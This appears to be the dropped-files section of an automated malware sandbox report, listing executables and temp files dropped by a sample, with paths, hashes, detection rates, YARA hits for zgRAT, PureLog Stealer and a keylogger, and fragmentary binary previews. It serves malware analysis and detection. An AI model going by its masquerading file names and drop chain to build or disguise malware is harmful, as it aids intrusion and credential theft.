MD5:	17D51083CCB2B20074B1DC2CAC5BEA36
SHA1:	0A046864AD4304F63DBDE5AC14D3DC05CFB48D46
SHA-256:	681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
SHA-512:	7DA8A2FD0321231C17FDDF414BF1D5A03D71DBC619F68958FF1D167003F972920F0F3C830B8A25AA715DF4FCC044D88D739B6EAB115A5B0B0A53852A70F4238A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................H....2......V.......`....@...........................7.......7..........@............................... ...P...v1..........f7..!......Dd..................................................................................CODE....`F.......H.................. ..`DATA....d....`.......L..............@...BSS.....Q............f...................idata... ......."...f..............@....tls.....................................rdata..............................@..P.reloc..Dd.......f..................@..P.rsrc....v1..P...v1.................@..P..............7......f7.............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6647095
Entropy (8bit):	6.633275439634301
Encrypted:	false
SSDEEP:	49152:fOnmFINjZnQl4uiQPnLX31zGXnmUYKLvOh7V0okZagCVJe8SxR26PoXw0rz1rlDh:fnnLlhut031rl27FpfLjnRbJkC9BXNk1
MD5:	7ADB5E2E04A5DCADA12236D363F6A4C4
SHA1:	31DF5F1B2F938F5E2DC24F7476C6A65E5C72A090
SHA-256:	E4EB8D8749C137084F9C2AB212E0B58799B66EE9548C3B886EFEDD9BBCD8676C
SHA-512:	8386ACC0569404991E42488E1601A571DAFC3B9A1880EE4647A7B6A9F0BE09F44B1022355ABA774305E1A25C3A7A4AAF96381418BBFB08B6D8C308C0AEFFA3ED
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.._..%.........#..G..jZ...f...........G...@..................................Hf....... ......................P..B....`...................................(...........................H......................a...............................text...$.G.......G.................`.P`.data.........G.......G.............@.`..rdata........H.......G.............@.`@/4......$.....H.......H.............@.0@.bss......f..`L.......................`..edata..B....P.......6L.............@.0@.idata.......`.......8L.............@.0..CRT....4....p.......BL.............@.0..tls.................DL.............@.0..reloc...(.......*...FL.............@.0B/14..................pZ.............@..B/29.................xZ.............@..B/41.....XL.......N... \.............@..B/55.....B............n\.............@..B/67.....T............R].............@.0B/80.....a............p].

C:\Users\user\AppData\Local\Temp\1000241001\build.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	423424
Entropy (8bit):	6.131000136533007
Encrypted:	false
SSDEEP:	6144:iEA/WL7JVwOzx3TPI/AnfFx7tbEO1jOTktBJ8WF7zu4P+fF4a6gqbDc:ih/WhVwOl3TI/mJdQYK+O2Fb
MD5:	05C1BAAA01BD0AA0CCB5EC1C43A7D853
SHA1:	E47D7F53987EB147F599321C858FE8D71EBC0D71
SHA-256:	9998D38B192309056D5109AC27A8B13F2B36FC27BAC9EBDF5385452B2C1B0CDB
SHA-512:	996450FC8C8B702327EACFE2EB819C86BACCF4D49F2EB58D3DD2B3CE35733F1E00857AC71B290BC99DB71BAAB08D7D7B22EF5223504C93B26ADE0DF6C9369501
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].D...............0..B...2.......a... ........@.. ....................................@.................................`a..K.................................................................................... ............... ..H............text....A... ...B.................. ..`.rsrc............0...D..............@..@.reloc...............t..............@..B.................a......H.......DZ..h...............................................................(....(.....0...........s........~....%:....&~......&...s....%.....(...+o.....8[....o...............%..F~(...(.....%..G~(...(.....%..H~(...(.....%..e~(...(.....~)...(.......o......8......(......s.......s........~....}....~...........s....(....o....}......{.....I~(...(....o........9......I~(...(.......8C........~(...(....o....:......{....~*...(....8......{....~+...(.........(...........9........o.....

C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	6.216673519026734
Encrypted:	false
SSDEEP:	768:fcbuPx+zgDwfIH/335cJX2om4VQRIEvmg5+FOKo5h:flxT1H/335C2ozVQRItgMF4h
MD5:	B73CF29C0EA647C353E4771F0697C41F
SHA1:	3E5339B80DCFBDC80D946FC630C657654EF58DE7
SHA-256:	EDD76F144BBDBFC060F7CB7E19863F89EB55863EFC1A913561D812083B6306CD
SHA-512:	2274D4C1E0EF72DC7E73B977E315DDD5472EC35A52E3449B1F6B87336EE18FF8966FED0451D19D24293FDE101E0C231A3CAA08B7BD0047A18A41466C2525E2E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....I..........."...0.................. ........@.. ....................... ............@.................................:...O.......................................8............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................n.......H........1..............xJ.. y............................................~....}.....~....}.....~....}.....(.....(......{....t....}....6..s....(.......0..>........{....r...po...........o....&..{........(....(....}.....(.......0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.......

C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6641468
Entropy (8bit):	6.634863314519147
Encrypted:	false
SSDEEP:	49152:qVmOcOWin3OPJhJ2XcAJiiXD1D0VioUdZORT/MWzRllna64DGkZxvtSo6KLzYXR7:/OWQchArBD0VioUdZKLMyxnOGQ+6h9H+
MD5:	1F68ADC3E8D52FEF37E7E2DE22D0CD86
SHA1:	E52EFFC0915D0E3EA3CF9BD6565BB8163130613D
SHA-256:	C395613999C6F7D9E86A03F4259DD7F27C9E2964ED90D068F50F74F313918783
SHA-512:	B09DA4EF27B50303F996B977EEF735515B828E5F0283A40EA82CFAE1C57D15A6000ABF5E3E731F6169E007A25CAEF936DB037A43F69D59DEECB67DE957E046B1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 51%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.._..%.........#..G..fZ...f...........G...@.................................1.e....... ......................@..B....P.................................. ,...........................H......................Q...............................text...T.G.......G.................`.P`.data.........G.......G.............@.`..rdata........H.......G.............@.`@/4............H.......H.............@.0@.bss....T.f..PL.......................`..edata..B....@........L.............@.0@.idata.......P.......0L.............@.0..CRT....4....`.......:L.............@.0..tls.........p.......<L.............@.0..reloc.. ,...........>L.............@.0B/14..................lZ.............@..B/29.................tZ.............@..B/41.....XL...p...N....\.............@..B/55.....B............j\.............@..B/67.....T............N].............@.0B/80.....a............l].

C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	320000
Entropy (8bit):	7.989672073571282
Encrypted:	false
SSDEEP:	6144:H2dbvTyG8N6VjCaPxg+kERtJ4h1Kfq4Vop4u7O8Owsb:U+CFCAnXJ1RU4uK8O
MD5:	7E8C1E8B4C37553A6BC11083B18CEBDF
SHA1:	E34F459CB50A966089AFF945D81D97BB5578C8F7
SHA-256:	423E1C433FDE9AC5E1011A28A5CC2CCFA4D8A6C43A59CFEB969F204F76334129
SHA-512:	562685A9C2A52E97BAB98540175CEDDBE1430314718026E312ACE4C856882B0CB00A252D1CC4C6F695DB3597ECD1490B6AC0480AA9C0855C8BCC923ED04BE72C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o..f................................. ........@.. .......................@............`.................................t...W............................ ......<................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........l.............................................................;E..F.../..........S......&Mifb..M_.7.9[^+X.fQ... ...}...J..ev......q.^.-8t~..s...\|.Z...+.X..Mk[.....-...V.N.b-b..^.......B....G..g..Q.FR...]../\...&.w.t..ztMA....uyH....ob...p...v.s..3......f.#\#.E..s.f....#..C....\....G...".....A.....%%....U_..Q.v...............yP.G.[..k.,3.....v{.8..r...VK2..../....n..._.^..<.&.?.....@....eC..:.V.6.Sz7kHaR..@H...Y.V.H..h..B=.CC..n}...".8...J.../.

C:\Users\user\AppData\Local\Temp\246122658369

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	85681
Entropy (8bit):	7.844076480616997
Encrypted:	false
SSDEEP:	1536:CUjb583r5mc9RZdE9ArJ2mcbm5Ne708FGXyonK0COBzM97:vjbq3tmc9Xe94JSr08MZn5S97
MD5:	49505CCE4FF30307BC61066962B53E2C
SHA1:	4CA2D24CA113330A0E60FF003D47B2C1145CC889
SHA-256:	C748CD4655F25311DF49E5C729CE21CAE90C73B9D8CC6E7F4969CF41648DB67E
SHA-512:	4A1CD1B1F8B8B36E3F739BCE89C64BCED8398E4B1F39F6A34BA6006BB959088901C982D0DEA5E22C2F7F5F3B23F9C489149E9F500A17031DFDE7E4FED830B58F
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1934336
Entropy (8bit):	7.95490263397455
Encrypted:	false
SSDEEP:	49152:aA8LY0hk13QWLUf3ai8EAQzpYAqULN6MNZ:30hY3QWLU3aEACPqUB9
MD5:	884CDB86A958AE71754D1BA5C04A4F11
SHA1:	3A52A15BDCD7D291B2CEB4D173A774EBC587963E
SHA-256:	FF02BCDDE4DACB915CC3AEFDE1936BF0A17E08954982D90157C78CCE10C5E225
SHA-512:	5F8F3CF448DCD811830DE618E007EB824AC6BD8069BBA262E957D9A30525E6E31E8F06DA0FD1240B2D8653219EDA477285319DD2041F2CCCF78027374A8C8B6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 57%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@...........................M.....I.....@.................................W...k...........................p.L............................. .L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...afdpsowp.p...`2..h..................@...loqpciws......L......\..............@....taggant.0....L.."...b..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\TmpC568.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpC653.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpCF9E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpCF9F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpE1AF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpE1C0.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	242094080
Entropy (8bit):	0.0027497487267049508
Encrypted:	false
SSDEEP:	768:frFdPb0WnoH8x2Oib5kyMGzHQp9h9jRz:fxlVocFiaz
MD5:	472E142A23F668749CAFDD37EF9B4A08
SHA1:	3C772D9417CD79B54D35CE3A0064C3D1DDAD6008
SHA-256:	71EF0E5FE507E4341038F3AB286F2F4A8868D42AEE33DB0D3028C9EBCAF587E6
SHA-512:	D2A52F298FDFC53FBA63E3D79046E55BC93B6419E273626A8DD33FBDFED1833CA4C79E46F1D6C088A9A5C92AE4173026EE22152FEF16297C241877D3B1E8D7AA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...............#.v........................@.......................................@... .................................................................h...................................................X................................text....u.......v..................`.P`.data...X............z..............@.0..rdata..X............\|..............@.`@.eh_fram............................@.0@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..h...........................@.0B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\svchost015.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000191001\1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2990472
Entropy (8bit):	6.459856200541649
Encrypted:	false
SSDEEP:
MD5:	B826DD92D78EA2526E465A34324EBEEA
SHA1:	BF8A0093ACFD2EB93C102E1A5745FB080575372E
SHA-256:	7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
SHA-512:	1AC4B731B9B31CABF3B1C43AEE37206AEE5326C8E786ABE2AB38E031633B778F97F2D6545CF745C3066F3BD47B7AAF2DED2F9955475428100EAF271DD9AEEF17
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....\"f..................#.........l.#.......#...@..........................p1.....?.-...`...(..@...........................p&.l3....(...............-..!....................................&.....................................................CODE......#.......#................. ..`DATA....0.....#.......#.............@...BSS...........$......\$..................idata..l3...p&..4...\$.............@....tls....\|.....&.......$..................rdata........&.......$.............@..P.reloc.......&.......$.............@..P.rsrc.........(.......$.............@..P.............p1......,/.............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	557056
Entropy (8bit):	6.311657384729558
Encrypted:	false
SSDEEP:
MD5:	88367533C12315805C059E688E7CDFE9
SHA1:	64A107ADCBAC381C10BD9C5271C2087B7AA369EC
SHA-256:	C6FC5C06AD442526A787989BAE6CE0D32A2B15A12A41F78BACA336B6560997A9
SHA-512:	7A8C3D767D19395CE9FFEF964B0347A148E517982AFCF2FC5E45B4C524FD44EC20857F6BE722F57FF57722B952EF7B88F6249339551949B9E89CF60260F0A714
Malicious:	true
